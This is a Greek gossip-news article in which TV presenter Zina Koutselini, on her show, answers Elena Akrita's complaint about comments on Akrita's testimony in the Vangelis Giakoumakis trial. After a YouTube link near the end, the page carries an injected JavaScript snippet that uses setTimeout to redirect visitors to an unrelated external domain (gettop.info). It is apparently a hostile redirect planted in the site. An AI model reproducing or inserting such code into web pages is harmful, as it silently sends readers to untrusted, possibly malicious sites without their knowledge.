Κουτσελίνη: Δεν προσβάλαμε ποτέ κανέναν κυρία Ακρίτα

0
6

 

Απάντηση έδωσε η Ζήνα Κουσελίνη μέσα από την εκπομπή της στην Έλενα Ακρίτα που έστειλε μήνυμα στην εκπομπή «Αλήθειες με τη Ζήνα» για τα όσα ειπώθηκαν για την παρουσία της στη δίκη για τον Βαγγέλη Γιακουμάκη.

Η Ζήνα Κουτσελίνη τόνισε πως δεν είχαν πρόθεση να την προσβάλουν, ενώ αντιθέτως εξήγησαν πως πήγε επειδή το ήθελε και όχι για προβολή καθώς αυτή την περίοδο απέχει τηλεοπτικά και δεν έχει ανάγκη τη δημοσιότητα, όπως γράφει το gossiptv.gr.

«Ηταν στους 15 μάρτυρες που εκλήθησαν από την έδρα, το τονίσαμε και είπαμε ότι η κυρία Ακρίτα με επιστολή της προς τον υπουργό Προστασίας του Πολίτη κ. Πανούση δημοσιοποίησε τα όσα γνώριζε και την εμπλοή πολιτικού προσώπου. Η κυρία Ακρίτα είναι πρόσωπο που δεν επιζητά τη δημοσιότητα…» επέμεινε η Ζήνα Κουτσελίνη.

«Δεν έχετε λόγο να προβληθείτε, αυτό εννούσαμε, το κάνατε με την καρδιά σας, δεν εννοούσαμε δικαστικά, εννοούσαμε συναισθηματικά» υπογράμμισε η παρουσιάστρια.

https://www.youtube.com/watch?v=aSr4GaQ5hbQ setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here